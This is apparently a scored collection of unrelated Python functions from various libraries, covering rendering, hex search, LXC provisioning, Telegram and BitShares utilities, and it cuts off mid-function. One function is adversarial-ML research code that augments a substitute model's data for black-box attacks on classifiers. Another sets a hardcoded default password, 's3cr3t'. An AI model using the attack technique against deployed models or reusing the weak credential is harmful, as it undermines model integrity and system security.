def FindAll(params, ctxt, scope, stream, coord, interp): """ This function converts the argument data into a set of hex bytes and then searches the current file for all occurrences of those bytes. data may be any of the basic types or an array of one of the types. If data is an array of signed bytes, it is assumed to be a null-terminated string. To search for an array of hex bytes, create an unsigned char array and fill it with the target value. If the type being search for is a string, the matchcase and wholeworld arguments can be used to control the search (see Using Find for more information). method controls which search method is used from the following options: FINDMETHOD_NORMAL=0 - a normal search FINDMETHOD_WILDCARDS=1 - when searching for strings use wildcards '*' or '?' FINDMETHOD_REGEX=2 - when searching for strings use Regular Expressions wildcardMatchLength indicates the maximum number of characters a '*' can match when searching using wildcards. If the target is a float or double, the tolerance argument indicates that values that are only off by the tolerance value still match. If dir is 1 the find direction is down and if dir is 0 the find direction is up. start and size can be used to limit the area of the file that is searched. start is the starting byte address in the file where the search will begin and size is the number of bytes after start that will be searched. If size is zero, the file will be searched from start to the end of the file. The return value is a TFindResults structure. This structure contains a count variable indicating the number of matches, and a start array holding an array of starting positions, plus a size array which holds an array of target lengths. For example, use the following code to find all occurrences of the ASCII string "Test" in a file: """ matches_iter = _find_helper(params, ctxt, scope, stream, coord, interp) matches = list(matches_iter) types = interp.get_types() res = types.TFindResults() res.count = len(matches) # python3 map doesn't return a list starts = list(map(lambda m: m.start()+FIND_MATCHES_START_OFFSET, matches)) res.start = starts # python3 map doesn't return a list sizes = list(map(lambda m: m.end()-m.start(), matches)) res.size = sizes return res
0.001682
def image(self): """ Returns an image array of current render window """ if not hasattr(self, 'ren_win') and hasattr(self, 'last_image'): return self.last_image ifilter = vtk.vtkWindowToImageFilter() ifilter.SetInput(self.ren_win) ifilter.ReadFrontBufferOff() if self.image_transparent_background: ifilter.SetInputBufferTypeToRGBA() else: ifilter.SetInputBufferTypeToRGB() return self._run_image_filter(ifilter)
0.003914
def kwargs_mutual_exclusive(param1_name, param2_name, map2to1=None): """ If there exist mutually exclusive parameters checks for them and maps param2 to 1.""" def wrapper(func): @functools.wraps(func) def new_func(*args, **kwargs): if param2_name in kwargs: if param1_name in kwargs: raise ValueError('You cannot specify `%s` and `%s` at the same time, ' 'they are mutually exclusive.' % (param1_name, param2_name)) param2 = kwargs.pop(param2_name) if map2to1 is not None: param1 = map2to1(param2) else: param1 = param2 kwargs[param1_name] = param1 return func(*args, **kwargs) return new_func return wrapper
0.004717
def add_axes_at_origin(self): """ Add axes actor at origin Returns -------- marker_actor : vtk.vtkAxesActor vtkAxesActor actor """ self.marker_actor = vtk.vtkAxesActor() # renderer = self.renderers[self.loc_to_index(loc)] self.AddActor(self.marker_actor) self.parent._actors[str(hex(id(self.marker_actor)))] = self.marker_actor return self.marker_actor
0.006623
def get_version_rank(version): """ Converts a version string to it's rank. Usage:: >>> get_version_rank("4.2.8") 4002008000000 >>> get_version_rank("4.0") 4000000000000 >>> get_version_rank("4.2.8").__class__ <type 'int'> :param version: Current version to calculate rank. :type version: unicode :return: Rank. :rtype: int """ tokens = list(foundations.common.unpack_default(filter(any, re.split("\.|-|,", version)), length=4, default=0)) rank = sum((int(1000 ** i) * int(tokens[-i]) for i in range(len(tokens), 0, -1))) LOGGER.debug("> Rank: '{0}'.".format(rank)) return rank
0.005917
def set_restriction(self, command, user, event_types): """ Adds restriction for given `command`. :param command: command on which the restriction should be set. :type command: str :param user: username for which the restriction applies. :type user: str :param event_types: types of events for which the command is allowed. :type event_types: list """ self.commands_rights[command][user.lower()] = event_types if command not in self.triggers: self.triggers[command] = [EVT_PUBLIC, EVT_PRIVATE, EVT_NOTICE] if not hasattr(self, command): setattr(self, command, lambda msg: self.handle_rights(msg))
0.002793
def addPhoto(self, photo): """Add a photo to this set. photo - the photo """ method = 'flickr.photosets.addPhoto' _dopost(method, auth=True, photoset_id=self.id, photo_id=photo.id) self.__count += 1 return True
0.007435
async def disable(self, reason=None): """Enters maintenance mode Parameters: reason (str): Reason of disabling Returns: bool: ``True`` on success """ params = {"enable": True, "reason": reason} response = await self._api.put("/v1/agent/maintenance", params=params) return response.status == 200
0.005333
def _get_updated_values(before_values, after_values): """ Get updated values from 2 dicts of values Args: before_values (dict): values before update after_values (dict): values after update Returns: dict: a diff dict with key is field key, value is tuple of (before_value, after_value) """ assert before_values.keys() == after_values.keys() return dict([(k, [before_values[k], after_values[k]]) for k in before_values.keys() if before_values[k] != after_values[k]])
0.001776
def clear(self): """ Clears the field represented by this element @rtype: WebElementWrapper @return: Returns itself """ def clear_element(): """ Wrapper to clear element """ return self.element.clear() self.execute_and_handle_webelement_exceptions(clear_element, 'clear') return self
0.004963
def addReadGroupSet(self): """ Adds a new ReadGroupSet into this repo. """ self._openRepo() dataset = self._repo.getDatasetByName(self._args.datasetName) dataUrl = self._args.dataFile indexFile = self._args.indexFile parsed = urlparse.urlparse(dataUrl) # TODO, add https support and others when they have been # tested. if parsed.scheme in ['http', 'ftp']: if indexFile is None: raise exceptions.MissingIndexException(dataUrl) else: if indexFile is None: indexFile = dataUrl + ".bai" dataUrl = self._getFilePath(self._args.dataFile, self._args.relativePath) indexFile = self._getFilePath(indexFile, self._args.relativePath) name = self._args.name if self._args.name is None: name = getNameFromPath(dataUrl) readGroupSet = reads.HtslibReadGroupSet(dataset, name) readGroupSet.populateFromFile(dataUrl, indexFile) referenceSetName = self._args.referenceSetName if referenceSetName is None: # Try to find a reference set name from the BAM header. referenceSetName = readGroupSet.getBamHeaderReferenceSetName() referenceSet = self._repo.getReferenceSetByName(referenceSetName) readGroupSet.setReferenceSet(referenceSet) readGroupSet.setAttributes(json.loads(self._args.attributes)) self._updateRepo(self._repo.insertReadGroupSet, readGroupSet)
0.001273
def get_satellites_by_type(self, s_type): """Generic function to access one of the satellite attribute ie : self.pollers, self.reactionners ... :param s_type: satellite type wanted :type s_type: str :return: self.*type*s :rtype: list """ if hasattr(self, s_type + 's'): return getattr(self, s_type + 's') logger.debug("[realm %s] do not have this kind of satellites: %s", self.name, s_type) return []
0.006061
def jacobian_augmentation(sess, x, X_sub_prev, Y_sub, grads, lmbda, aug_batch_size=512, feed=None): """ Augment an adversary's substitute training set using the Jacobian of a substitute model to generate new synthetic inputs. See https://arxiv.org/abs/1602.02697 for more details. See cleverhans_tutorials/mnist_blackbox.py for example use case :param sess: TF session in which the substitute model is defined :param x: input TF placeholder for the substitute model :param X_sub_prev: substitute training data available to the adversary at the previous iteration :param Y_sub: substitute training labels available to the adversary at the previous iteration :param grads: Jacobian symbolic graph for the substitute (should be generated using utils_tf.jacobian_graph) :return: augmented substitute data (will need to be labeled by oracle) """ assert len(x.get_shape()) == len(np.shape(X_sub_prev)) assert len(grads) >= np.max(Y_sub) + 1 assert len(X_sub_prev) == len(Y_sub) aug_batch_size = min(aug_batch_size, X_sub_prev.shape[0]) # Prepare input_shape (outside loop) for feeding dictionary below input_shape = list(x.get_shape()) input_shape[0] = 1 # Create new numpy array for adversary training data # with twice as many components on the first dimension. X_sub = np.vstack([X_sub_prev, X_sub_prev]) num_samples = X_sub_prev.shape[0] # Creating and processing as batch for p_idxs in range(0, num_samples, aug_batch_size): X_batch = X_sub_prev[p_idxs:p_idxs + aug_batch_size, ...] feed_dict = {x: X_batch} if feed is not None: feed_dict.update(feed) # Compute sign matrix grad_val = sess.run([tf.sign(grads)], feed_dict=feed_dict)[0] # Create new synthetic point in adversary substitute training set for (indx, ind) in zip(range(p_idxs, p_idxs + X_batch.shape[0]), range(X_batch.shape[0])): X_sub[num_samples + indx] = ( X_batch[ind] + lmbda * grad_val[Y_sub[indx], ind, ...]) # Return augmented training data (needs to be labeled afterwards) return X_sub
0.008158
def sample(self): '''Returns the stream's rows used as sample. These sample rows are used internally to infer characteristics of the source file (e.g. encoding, headers, ...). ''' sample = [] iterator = iter(self.__sample_extended_rows) iterator = self.__apply_processors(iterator) for row_number, headers, row in iterator: sample.append(row) return sample
0.004535
def _regroup(self): """Update the output :math:`g` keeping the map :math:`\pi` fixed. Compute the KL between all input and output components. """ # clean up old maps for j in range(self.nout): self.inv_map[j] = [] # find smallest divergence between input component i # and output component j of the cluster mixture density for i in range(self.nin): self.min_kl[i] = np.inf j_min = None for j in range(self.nout): kl = kullback_leibler(self.f.components[i], self.g.components[j]) if kl < self.min_kl[i]: self.min_kl[i] = kl j_min = j assert j_min is not None self.inv_map[j_min].append(i)
0.005019
def sentence(random=random, *args, **kwargs): """ Return a whole sentence >>> mock_random.seed(0) >>> sentence(random=mock_random) "Agatha Incrediblebritches can't wait to smell two chimps in Boatbencheston." >>> mock_random.seed(2) >>> sentence(random=mock_random, slugify=True) 'blistersecret-studios-is-the-best-company-in-liveronion' """ if 'name' in kwargs and kwargs['name']: nm = kwargs(name) elif random.choice([True, False, False]): nm = name(capitalize=True, random=random) else: nm = random.choice(people) def type_one(): return "{name} will {verb} {thing}.".format(name=nm, verb=verb(random=random), thing=random.choice([a_thing(random=random), things(random=random)])) def type_two(): return "{city} is in {country}.".format(city=city(capitalize=True, random=random), country=country(capitalize=True, random=random)) def type_three(): return "{name} can't wait to {verb} {thing} in {city}.".format(name=nm, verb=verb(random=random), thing=a_thing(random=random), city=city(capitalize=True, random=random)) def type_four(): return "{name} will head to {company} to buy {thing}.".format(name=nm, company=company(capitalize=True, random=random), thing=a_thing(random=random)) def type_five(): return "{company} is the best company in {city}.".format(city=city(capitalize=True, random=random), company=company(capitalize=True, random=random)) def type_six(): return "To get to {country}, you need to go to {city}, then drive {direction}.".format( country=country(capitalize=True, random=random), city=city(capitalize=True, random=random), direction=direction(random=random)) def type_seven(): return "{name} needs {thing}, badly.".format(name=nm, thing=a_thing(random=random)) def type_eight(): return "{verb} {noun}!".format(verb=verb(capitalize=True, random=random), noun=noun(random=random)) return random.choice([type_one, type_two, type_three, type_four, type_five, type_six, type_seven, type_eight])()
0.00744
def _wait_response(self, message): """ Private function to get responses from the server. :param message: the received message """ if message is None or message.code != defines.Codes.CONTINUE.number: self.queue.put(message)
0.007246
def appendData(self, content): """ Add characters to the element's pcdata. """ if self.pcdata is not None: self.pcdata += content else: self.pcdata = content
0.052023
def context_list(zap_helper): """List the available contexts.""" contexts = zap_helper.zap.context.context_list if len(contexts): console.info('Available contexts: {0}'.format(contexts[1:-1])) else: console.info('No contexts available in the current session')
0.003436
def search_host_and_dispatch(self, host_name, command, extcmd): # pylint: disable=too-many-branches """Try to dispatch a command for a specific host (so specific scheduler) because this command is related to a host (change notification interval for example) :param host_name: host name to search :type host_name: str :param command: command line :type command: str :param extcmd: external command object (the object will be added to sched commands list) :type extcmd: alignak.external_command.ExternalCommand :return: None """ logger.debug("Calling search_host_and_dispatch for %s", host_name) host_found = False # If we are a receiver, just look in the receiver if self.mode == 'receiver': logger.debug("Receiver is searching a scheduler for the external command %s %s", host_name, command) scheduler_link = self.daemon.get_scheduler_from_hostname(host_name) if scheduler_link: host_found = True logger.debug("Receiver pushing external command to scheduler %s", scheduler_link.name) scheduler_link.pushed_commands.append(extcmd) else: logger.warning("I did not found a scheduler for the host: %s", host_name) else: for cfg_part in list(self.cfg_parts.values()): if cfg_part.hosts.find_by_name(host_name) is not None: logger.debug("Host %s found in a configuration", host_name) if cfg_part.is_assigned: host_found = True scheduler_link = cfg_part.scheduler_link logger.debug("Sending command to the scheduler %s", scheduler_link.name) scheduler_link.push_external_commands([command]) # scheduler_link.my_daemon.external_commands.append(command) break else: logger.warning("Problem: the host %s was found in a configuration, " "but this configuration is not assigned to any scheduler!", host_name) if not host_found: if self.accept_passive_unknown_check_results: brok = self.get_unknown_check_result_brok(command) if brok: self.send_an_element(brok) else: logger.warning("External command was received for the host '%s', " "but the host could not be found! Command is: %s", host_name, command) else: logger.warning("External command was received for host '%s', " "but the host could not be found!", host_name)
0.004704
def regex_in_package_file(regex, filename, package_name, return_match=False): """ Search for a regex in a file contained within the package directory If return_match is True, return the found object instead of a boolean """ filepath = package_file_path(filename, package_name) return regex_in_file(regex, filepath, return_match=return_match)
0.002762
def get_extension(media): """Gets the corresponding extension for any Telegram media.""" # Photos are always compressed as .jpg by Telegram if isinstance(media, (types.UserProfilePhoto, types.ChatPhoto, types.MessageMediaPhoto)): return '.jpg' # Documents will come with a mime type if isinstance(media, types.MessageMediaDocument): media = media.document if isinstance(media, ( types.Document, types.WebDocument, types.WebDocumentNoProxy)): if media.mime_type == 'application/octet-stream': # Octet stream are just bytes, which have no default extension return '' else: return guess_extension(media.mime_type) or '' return ''
0.001311
def cloud_init_interface(name, vm_=None, **kwargs): ''' Interface between salt.cloud.lxc driver and lxc.init ``vm_`` is a mapping of vm opts in the salt.cloud format as documented for the lxc driver. This can be used either: - from the salt cloud driver - because you find the argument to give easier here than using directly lxc.init .. warning:: BE REALLY CAREFUL CHANGING DEFAULTS !!! IT'S A RETRO COMPATIBLE INTERFACE WITH THE SALT CLOUD DRIVER (ask kiorky). name name of the lxc container to create pub_key public key to preseed the minion with. Can be the keycontent or a filepath priv_key private key to preseed the minion with. Can be the keycontent or a filepath path path to the container parent directory (default: /var/lib/lxc) .. versionadded:: 2015.8.0 profile :ref:`profile <tutorial-lxc-profiles-container>` selection network_profile :ref:`network profile <tutorial-lxc-profiles-network>` selection nic_opts per interface settings compatibles with network profile (ipv4/ipv6/link/gateway/mac/netmask) eg:: - {'eth0': {'mac': '00:16:3e:01:29:40', 'gateway': None, (default) 'link': 'br0', (default) 'gateway': None, (default) 'netmask': '', (default) 'ip': '22.1.4.25'}} unconditional_install given to lxc.bootstrap (see relative doc) force_install given to lxc.bootstrap (see relative doc) config any extra argument for the salt minion config dnsservers list of DNS servers to set inside the container dns_via_dhcp do not set the dns servers, let them be set by the dhcp. autostart autostart the container at boot time password administrative password for the container bootstrap_delay delay before launching bootstrap script at Container init .. warning:: Legacy but still supported options: from_container which container we use as a template when running lxc.clone image which template do we use when we are using lxc.create. This is the default mode unless you specify something in from_container backing which backing store to use. Values can be: overlayfs, dir(default), lvm, zfs, brtfs fstype When using a blockdevice level backing store, which filesystem to use on size When using a blockdevice level backing store, which size for the filesystem to use on snapshot Use snapshot when cloning the container source vgname if using LVM: vgname lvname if using LVM: lvname thinpool: if using LVM: thinpool ip ip for the primary nic mac mac address for the primary nic netmask netmask for the primary nic (24) = ``vm_.get('netmask', '24')`` bridge bridge for the primary nic (lxcbr0) gateway network gateway for the container additional_ips additional ips which will be wired on the main bridge (br0) which is connected to internet. Be aware that you may use manual virtual mac addresses providen by you provider (online, ovh, etc). This is a list of mappings {ip: '', mac: '', netmask:''} Set gateway to None and an interface with a gateway to escape from another interface that eth0. eg:: - {'mac': '00:16:3e:01:29:40', 'gateway': None, (default) 'link': 'br0', (default) 'netmask': '', (default) 'ip': '22.1.4.25'} users administrative users for the container default: [root] and [root, ubuntu] on ubuntu default_nic name of the first interface, you should really not override this CLI Example: .. code-block:: bash salt '*' lxc.cloud_init_interface foo ''' if vm_ is None: vm_ = {} vm_ = copy.deepcopy(vm_) vm_ = salt.utils.dictupdate.update(vm_, kwargs) profile_data = copy.deepcopy( vm_.get('lxc_profile', vm_.get('profile', {}))) if not isinstance(profile_data, (dict, six.string_types)): profile_data = {} profile = get_container_profile(profile_data) def _cloud_get(k, default=None): return vm_.get(k, profile.get(k, default)) if name is None: name = vm_['name'] # if we are on ubuntu, default to ubuntu default_template = '' if __grains__.get('os', '') in ['Ubuntu']: default_template = 'ubuntu' image = _cloud_get('image') if not image: _cloud_get('template', default_template) backing = _cloud_get('backing', 'dir') if image: profile['template'] = image vgname = _cloud_get('vgname', None) if vgname: profile['vgname'] = vgname if backing: profile['backing'] = backing snapshot = _cloud_get('snapshot', False) autostart = bool(_cloud_get('autostart', True)) dnsservers = _cloud_get('dnsservers', []) dns_via_dhcp = _cloud_get('dns_via_dhcp', True) password = _cloud_get('password', 's3cr3t') password_encrypted = _cloud_get('password_encrypted', False) fstype = _cloud_get('fstype', None) lvname = _cloud_get('lvname', None) thinpool = _cloud_get('thinpool', None) pub_key = _cloud_get('pub_key', None) priv_key = _cloud_get('priv_key', None) size = _cloud_get('size', '20G') script = _cloud_get('script', None) script_args = _cloud_get('script_args', None) users = _cloud_get('users', None) if users is None: users = [] ssh_username = _cloud_get('ssh_username', None) if ssh_username and (ssh_username not in users): users.append(ssh_username) network_profile = _cloud_get('network_profile', None) nic_opts = kwargs.get('nic_opts', None) netmask = _cloud_get('netmask', '24') path = _cloud_get('path', None) bridge = _cloud_get('bridge', None) gateway = _cloud_get('gateway', None) unconditional_install = _cloud_get('unconditional_install', False) force_install = _cloud_get('force_install', True) config = _get_salt_config(_cloud_get('config', {}), **vm_) default_nic = _cloud_get('default_nic', DEFAULT_NIC) # do the interface with lxc.init mainly via nic_opts # to avoid extra and confusing extra use cases. if not isinstance(nic_opts, dict): nic_opts = salt.utils.odict.OrderedDict() # have a reference to the default nic eth0 = nic_opts.setdefault(default_nic, salt.utils.odict.OrderedDict()) # lxc config is based of ifc order, be sure to use odicts. if not isinstance(nic_opts, salt.utils.odict.OrderedDict): bnic_opts = salt.utils.odict.OrderedDict() bnic_opts.update(nic_opts) nic_opts = bnic_opts gw = None # legacy salt.cloud scheme for network interfaces settings support bridge = _cloud_get('bridge', None) ip = _cloud_get('ip', None) mac = _cloud_get('mac', None) if ip: fullip = ip if netmask: fullip += '/{0}'.format(netmask) eth0['ipv4'] = fullip if mac is not None: eth0['mac'] = mac for ix, iopts in enumerate(_cloud_get("additional_ips", [])): ifh = "eth{0}".format(ix+1) ethx = nic_opts.setdefault(ifh, {}) if gw is None: gw = iopts.get('gateway', ethx.get('gateway', None)) if gw: # only one and only one default gateway is allowed ! eth0.pop('gateway', None) gateway = None # even if the gateway if on default "eth0" nic # and we popped it will work # as we reinject or set it here. ethx['gateway'] = gw elink = iopts.get('link', ethx.get('link', None)) if elink: ethx['link'] = elink # allow dhcp aip = iopts.get('ipv4', iopts.get('ip', None)) if aip: ethx['ipv4'] = aip nm = iopts.get('netmask', '') if nm: ethx['ipv4'] += '/{0}'.format(nm) for i in ('mac', 'hwaddr'): if i in iopts: ethx['mac'] = iopts[i] break if 'mac' not in ethx: ethx['mac'] = salt.utils.network.gen_mac() # last round checking for unique gateway and such gw = None for ethx in [a for a in nic_opts]: ndata = nic_opts[ethx] if gw: ndata.pop('gateway', None) if 'gateway' in ndata: gw = ndata['gateway'] gateway = None # only use a default bridge / gateway if we configured them # via the legacy salt cloud configuration style. # On other cases, we should rely on settings provided by the new # salt lxc network profile style configuration which can # be also be overridden or a per interface basis via the nic_opts dict. if bridge: eth0['link'] = bridge if gateway: eth0['gateway'] = gateway # lxc_init_interface = {} lxc_init_interface['name'] = name lxc_init_interface['config'] = config lxc_init_interface['memory'] = _cloud_get('memory', 0) # nolimit lxc_init_interface['pub_key'] = pub_key lxc_init_interface['priv_key'] = priv_key lxc_init_interface['nic_opts'] = nic_opts for clone_from in ['clone_from', 'clone', 'from_container']: # clone_from should default to None if not available lxc_init_interface['clone_from'] = _cloud_get(clone_from, None) if lxc_init_interface['clone_from'] is not None: break lxc_init_interface['profile'] = profile lxc_init_interface['snapshot'] = snapshot lxc_init_interface['dnsservers'] = dnsservers lxc_init_interface['fstype'] = fstype lxc_init_interface['path'] = path lxc_init_interface['vgname'] = vgname lxc_init_interface['size'] = size lxc_init_interface['lvname'] = lvname lxc_init_interface['thinpool'] = thinpool lxc_init_interface['force_install'] = force_install lxc_init_interface['unconditional_install'] = ( unconditional_install ) lxc_init_interface['bootstrap_url'] = script lxc_init_interface['bootstrap_args'] = script_args lxc_init_interface['bootstrap_shell'] = _cloud_get('bootstrap_shell', 'sh') lxc_init_interface['bootstrap_delay'] = _cloud_get('bootstrap_delay', None) lxc_init_interface['autostart'] = autostart lxc_init_interface['users'] = users lxc_init_interface['password'] = password lxc_init_interface['password_encrypted'] = password_encrypted # be sure not to let objects goes inside the return # as this return will be msgpacked for use in the runner ! lxc_init_interface['network_profile'] = network_profile for i in ['cpu', 'cpuset', 'cpushare']: if _cloud_get(i, None): try: lxc_init_interface[i] = vm_[i] except KeyError: lxc_init_interface[i] = profile[i] return lxc_init_interface
0.000086
def get_asset_contents(self): """Gets the content of this asset. return: (osid.repository.AssetContentList) - the asset contents raise: OperationFailed - unable to complete request *compliance: mandatory -- This method must be implemented.* """ # Implemented from template for osid.repository.Asset.get_asset_contents_template return AssetContentList( self._my_map['assetContents'], runtime=self._runtime, proxy=self._proxy)
0.00578
def pretty_const(value): """Make a constant pretty for printing in GUI""" words = value.split('_') pretty = words[0].capitalize() for word in words[1:]: pretty += ' ' + word.lower() return pretty
0.004484
def handle_event(self, event): """ When we get an 'event' type from the bridge handle it by invoking the handler and if needed sending back the result. """ result_id, ptr, method, args = event[1] obj = None result = None try: obj, handler = bridge.get_handler(ptr, method) result = handler(*[v for t, v in args]) except bridge.BridgeReferenceError as e: #: Log the event, don't blow up here msg = "Error processing event: {} - {}".format( event, e).encode("utf-8") print(msg) self.show_error(msg) except: #: Log the event, blow up in user's face msg = "Error processing event: {} - {}".format( event, traceback.format_exc()).encode("utf-8") print(msg) self.show_error(msg) raise finally: if result_id: if hasattr(obj, '__nativeclass__'): sig = getattr(type(obj), method).__returns__ else: sig = type(result).__name__ self.send_event( bridge.Command.RESULT, #: method result_id, bridge.msgpack_encoder(sig, result) #: args )
0.002926
def SympyCreate(n): """Creation operator for a Hilbert space of dimension `n`, as an instance of `sympy.Matrix`""" a = sympy.zeros(n) for i in range(1, n): a += sympy.sqrt(i) * basis_state(i, n) * basis_state(i-1, n).H return a
0.003922
def _set_clear_mpls_auto_bandwidth_statistics_all(self, v, load=False): """ Setter method for clear_mpls_auto_bandwidth_statistics_all, mapped from YANG variable /brocade_mpls_rpc/clear_mpls_auto_bandwidth_statistics_all (rpc) If this variable is read-only (config: false) in the source YANG file, then _set_clear_mpls_auto_bandwidth_statistics_all is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_clear_mpls_auto_bandwidth_statistics_all() directly. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=clear_mpls_auto_bandwidth_statistics_all.clear_mpls_auto_bandwidth_statistics_all, is_leaf=True, yang_name="clear-mpls-auto-bandwidth-statistics-all", rest_name="clear-mpls-auto-bandwidth-statistics-all", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, extensions={u'tailf-common': {u'hidden': u'rpccmd', u'actionpoint': u'clearMplsAutoBandwidthStatisticsAll'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='rpc', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """clear_mpls_auto_bandwidth_statistics_all must be of a type compatible with rpc""", 'defined-type': "rpc", 'generated-type': """YANGDynClass(base=clear_mpls_auto_bandwidth_statistics_all.clear_mpls_auto_bandwidth_statistics_all, is_leaf=True, yang_name="clear-mpls-auto-bandwidth-statistics-all", rest_name="clear-mpls-auto-bandwidth-statistics-all", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, extensions={u'tailf-common': {u'hidden': u'rpccmd', u'actionpoint': u'clearMplsAutoBandwidthStatisticsAll'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='rpc', is_config=True)""", }) self.__clear_mpls_auto_bandwidth_statistics_all = t if hasattr(self, '_set'): self._set()
0.005831
def _parameterize_obj(obj): """Recursively parameterize all strings contained in an object. Parameterizes all values of a Mapping, all items of a Sequence, an unicode string, or pass other objects through unmodified. Byte strings will be interpreted as UTF-8. Args: obj: data to parameterize Return: A parameterized object to be included in a CloudFormation template. Mappings are converted to `dict`, Sequences are converted to `list`, and strings possibly replaced by compositions of function calls. """ if isinstance(obj, Mapping): return dict((key, _parameterize_obj(value)) for key, value in obj.items()) elif isinstance(obj, bytes): return _parameterize_string(obj.decode('utf8')) elif isinstance(obj, str): return _parameterize_string(obj) elif isinstance(obj, Sequence): return list(_parameterize_obj(item) for item in obj) else: return obj
0.001006
def search_unique_identities_slice(db, term, offset, limit): """Look for unique identities using slicing. This function returns those unique identities which match with the given `term`. The term will be compared with name, email, username and source values of each identity. When an empty term is given, all unique identities will be returned. The results are limited by `offset` (starting on 0) and `limit`. Along with the list of unique identities, this function returns the total number of unique identities that match the given `term`. :param db: database manager :param term: term to match with unique identities data :param offset: return results starting on this position :param limit: maximum number of unique identities to return :raises InvalidValueError: raised when either the given value of `offset` or `limit` is lower than zero """ uidentities = [] pattern = '%' + term + '%' if term else None if offset < 0: raise InvalidValueError('offset must be greater than 0 - %s given' % str(offset)) if limit < 0: raise InvalidValueError('limit must be greater than 0 - %s given' % str(limit)) with db.connect() as session: query = session.query(UniqueIdentity).\ join(Identity).\ filter(UniqueIdentity.uuid == Identity.uuid) if pattern: query = query.filter(Identity.name.like(pattern) | Identity.email.like(pattern) | Identity.username.like(pattern) | Identity.source.like(pattern)) query = query.group_by(UniqueIdentity).\ order_by(UniqueIdentity.uuid) # Get the total number of unique identities for that search nuids = query.count() start = offset end = offset + limit uidentities = query.slice(start, end).all() # Detach objects from the session session.expunge_all() return uidentities, nuids
0.000473
def decouple(fn): """ Inverse operation of couple. Create two functions of one argument and one return from a function that takes two arguments and has two returns Examples -------- >>> h = lambda x: (2*x**3, 6*x**2) >>> f, g = decouple(h) >>> f(5) 250 >>> g(5) 150 """ def fst(*args, **kwargs): return fn(*args, **kwargs)[0] def snd(*args, **kwargs): return fn(*args, **kwargs)[1] return fst, snd
0.00207
def build_joblist(jobgraph): """Returns a list of jobs, from a passed jobgraph.""" jobset = set() for job in jobgraph: jobset = populate_jobset(job, jobset, depth=1) return list(jobset)
0.004785
def text(self, txt, x, y, width=None, height=1000000, outline=False, draw=True, **kwargs): ''' Draws a string of text according to current font settings. :param txt: Text to output :param x: x-coordinate of the top left corner :param y: y-coordinate of the top left corner :param width: text width :param height: text height :param outline: If True draws outline text (defaults to False) :param draw: Set to False to inhibit immediate drawing (defaults to True) :return: Path object representing the text. ''' txt = self.Text(txt, x, y, width, height, outline=outline, ctx=None, **kwargs) if outline: path = txt.path if draw: path.draw() return path else: return txt
0.005931
def _pred(aclass): """ :param aclass :return: boolean """ isaclass = inspect.isclass(aclass) return isaclass and aclass.__module__ == _pred.__module__
0.005747
def is_binary(f): """Return True if binary mode.""" # NOTE: order matters here. We don't bail on Python 2 just yet. Both # codecs.open() and io.open() can open in text mode, both set the encoding # attribute. We must do that check first. # If it has a decoding attribute with a value, it is text mode. if getattr(f, "encoding", None): return False # Python 2 makes no further distinction. if not PY3: return True # If the file has a mode, and it contains b, it is binary. try: if 'b' in getattr(f, 'mode', ''): return True except TypeError: import gzip if isinstance(f, gzip.GzipFile): return True # in gzip mode is an integer raise # Can we sniff? try: f.seek(0, os.SEEK_CUR) except (AttributeError, IOError): return False # Finally, let's sniff by reading a byte. byte = f.read(1) f.seek(-1, os.SEEK_CUR) return hasattr(byte, 'decode')
0.000997
def generic_filter(generic_qs_model, filter_qs_model, gfk_field=None): """ Only show me ratings made on foods that start with "a": a_foods = Food.objects.filter(name__startswith='a') generic_filter(Rating.objects.all(), a_foods) Only show me comments from entries that are marked as public: generic_filter(Comment.objects.public(), Entry.objects.public()) :param generic_qs_model: A model or queryset containing a GFK, e.g. comments :param qs_model: A model or a queryset of objects you want to restrict the generic_qs to :param gfk_field: explicitly specify the field w/the gfk """ generic_qs = normalize_qs_model(generic_qs_model) filter_qs = normalize_qs_model(filter_qs_model) if not gfk_field: gfk_field = get_gfk_field(generic_qs.model) pk_field_type = get_field_type(filter_qs.model._meta.pk) gfk_field_type = get_field_type(generic_qs.model._meta.get_field(gfk_field.fk_field)) if pk_field_type != gfk_field_type: return fallback_generic_filter(generic_qs, filter_qs, gfk_field) return generic_qs.filter(**{ gfk_field.ct_field: ContentType.objects.get_for_model(filter_qs.model), '%s__in' % gfk_field.fk_field: filter_qs.values('pk'), })
0.008488
def is_valid_ipv6_prefix(ipv6_prefix): """Returns True if given `ipv6_prefix` is a valid IPv6 prefix.""" # Validate input type if not isinstance(ipv6_prefix, str): return False tokens = ipv6_prefix.split('/') if len(tokens) != 2: return False # Validate address/mask and return return is_valid_ipv6(tokens[0]) and is_valid_ip_prefix(tokens[1], 128)
0.002532
def feeds(ctx, assets, pricethreshold, maxage): """ Price Feed Overview """ import builtins witnesses = Witnesses(bitshares_instance=ctx.bitshares) def test_price(p, ref): if math.fabs(float(p / ref) - 1.0) > pricethreshold / 100.0: return click.style(str(p), fg="red") elif math.fabs(float(p / ref) - 1.0) > pricethreshold / 2.0 / 100.0: return click.style(str(p), fg="yellow") else: return click.style(str(p), fg="green") def price_diff(p, ref): d = (float(p) - float(ref)) / float(ref) * 100 if math.fabs(d) >= 5: color = "red" elif math.fabs(d) >= 2.5: color = "yellow" else: color = "green" return click.style("{:8.2f}%".format(d), fg=color) def test_date(d): t = d.replace(tzinfo=None) now = datetime.utcnow() if now < t + timedelta(minutes=maxage): return click.style(str(t), fg="green") if now < t + timedelta(minutes=maxage / 2.0): return click.style(str(t), fg="yellow") else: return click.style(str(t), fg="red") output = "" for asset in tqdm(assets): t = PrettyTable( [ "Asset", "Producer", "Active Witness", "Date", "Settlement Price", "Core Exchange Price", "MCR", "SSPR", "delta", ] ) t.align = "c" t.align["Producer"] = "l" asset = Asset(asset, full=True, bitshares_instance=ctx.bitshares) current_feed = asset.feed feeds = asset.feeds producingwitnesses = builtins.set() witness_accounts = [x["witness_account"] for x in witnesses] for feed in tqdm(feeds): producingwitnesses.add(feed["producer"]["id"]) t.add_row( [ asset["symbol"], feed["producer"]["name"], click.style( "X" if feed["producer"]["id"] in witness_accounts else "", bold=True, ), test_date(feed["date"]), test_price( feed["settlement_price"], current_feed["settlement_price"] ), test_price( feed["core_exchange_rate"], current_feed["core_exchange_rate"] ), feed["maintenance_collateral_ratio"] / 10, feed["maximum_short_squeeze_ratio"] / 10, 